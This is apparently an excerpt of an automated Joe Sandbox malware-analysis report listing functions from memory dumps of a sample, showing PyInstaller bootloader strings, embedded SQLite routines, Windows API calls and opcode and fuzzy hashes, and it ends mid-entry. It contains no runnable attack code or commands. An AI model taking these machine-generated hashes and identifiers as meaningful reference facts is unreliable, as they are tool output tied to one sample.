                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                              • API String ID: 438689982-4201244970
                                                                                                                                                                                                                                              • Opcode ID: 534f87b9525e1accf40b52a836aaac86efe7d32416019845943bf01981245331
                                                                                                                                                                                                                                              • Instruction ID: 64ff999aeec9443a5c7f11163a9b42b244827bc4a526b9760c0db288854a0cf9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 534f87b9525e1accf40b52a836aaac86efe7d32416019845943bf01981245331
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3732A32AB0978286EB688F299560B793791FF45B95F448274CA7E0B7D9DF3CE452C300

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction ID: f3ffae9780d734514fcb538aa07b0dcc20ba3d22e7a81d5df1322f1f37e7ba48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1DF32B28A4686EF10CFA9D8962AC3761FB59BA8B014235DE1E977D4DF7DD051C301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                              • API String ID: 3510742995-509082904
                                                                                                                                                                                                                                              • Opcode ID: 3813dd515519295f32aca46ee02c005523f9b24ddf3d1145810d555d305960f9
                                                                                                                                                                                                                                              • Instruction ID: 8544716f64ef64bd21adec6aec81f44b2c1d69c18b1279dd84e450e30b1392e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3813dd515519295f32aca46ee02c005523f9b24ddf3d1145810d555d305960f9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61128D25B09A4289EB5C9F15E5B0B7967A0FF44B88F984175DE6E076DCCFBCE8418302

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155DC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: HeapFree.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                              • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                              • Instruction ID: 0e42b684767fa3ed664132e555174cfc10165d9da2b06abb7b9885b629ba32e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451C532A0864286EF10DF29DC8B5B96760FFA87A4F808135EA4DC7B95DF7CE4418746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                              • API String ID: 438689982-1046679716
                                                                                                                                                                                                                                              • Opcode ID: 0ecd3076d2d6882fb6d98c0ff67cdcd04c4eb88a955b905f157665d830e12fac
                                                                                                                                                                                                                                              • Instruction ID: 294e6d676861b19fa68f1278cda6abf9b840c44fe32e822b72eaf17bce5ce0af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ecd3076d2d6882fb6d98c0ff67cdcd04c4eb88a955b905f157665d830e12fac
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96F19332B0C6C286EB288F659424BBA67A4FB85B48F8D4275DA6D077D9CF7CE541C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpystrcmp
                                                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                                                              • API String ID: 4075415522-2920599690
                                                                                                                                                                                                                                              • Opcode ID: 72605cf81aeba0c39d3a3bbad278fd64cd5b90fc2f38520c9aff5f17e0d3d4b5
                                                                                                                                                                                                                                              • Instruction ID: 4124ad41d7d78b041bca49d2b21fbce26fecd3b578755b4b9cc6247a4b85b1db
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72605cf81aeba0c39d3a3bbad278fd64cd5b90fc2f38520c9aff5f17e0d3d4b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE426126F0978286FB688B26E560B7D27A0FF88B88F4441B5DA6D477D9DF3CE4558300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction ID: 5c466dba17c168f6fd9a0177b639aa02d90b1af07c7b936a826a034eeb355c6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F06862A1874186FBB09B64B8997667350EB85778F040335DE6D42AD4DF7CD089CA05
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 31276548-0

Control-flow Graph
APIs
  • Part of subcall function 00007FF62C0F7F90: _fread_nolock.LIBCMT ref: 00007FF62C0F803A
• _fread_nolock.LIBCMT ref: 00007FF62C0F1A1B
  • Part of subcall function 00007FF62C0F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36E1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36EB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction ID: 4e8cdb5d84c73ba29dae0b0be3486a0f330b31544a968323086ec233db2db0ea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921A761F1CA4285FE309724EC163BA2250BF98374F404132EE5DC25E5EF6DE645C74A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                              • API String ID: 3510742995-879093740
                                                                                                                                                                                                                                              • Opcode ID: ba2d0f86b6dcf29befeee4b93b35b993a661bf8d68e9ff4e596beaf804d09bdb
                                                                                                                                                                                                                                              • Instruction ID: 9c7208093128e9963853f738c9e9a0edf11b1cb28f046bdc85dd15533bbe32d8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba2d0f86b6dcf29befeee4b93b35b993a661bf8d68e9ff4e596beaf804d09bdb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FE1F522F087918AFB18CBA5C560ABC27A5FB45788F4981B5CE2C177D9DF38E452C340

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                              • Instruction ID: d5de01b296e57e1315b7a636ad8fd171338d95024b338c194b25237a98fabddb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C1F322A0C68792EF609B15984A2BD7B50FB81BF4F554131EE4E83791EE7CE865C702

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateMappingViewmemset
                                                                                                                                                                                                                                              • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                                                              • API String ID: 3919632203-2257004166
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$FileReadmemset
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                              • API String ID: 2051157613-1843600136
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset$CreateFile
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                              • API String ID: 333288564-3829269058
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFABED1A0), ref: 00007FFDFABA911D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                              • API String ID: 3510742995-3538577999
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
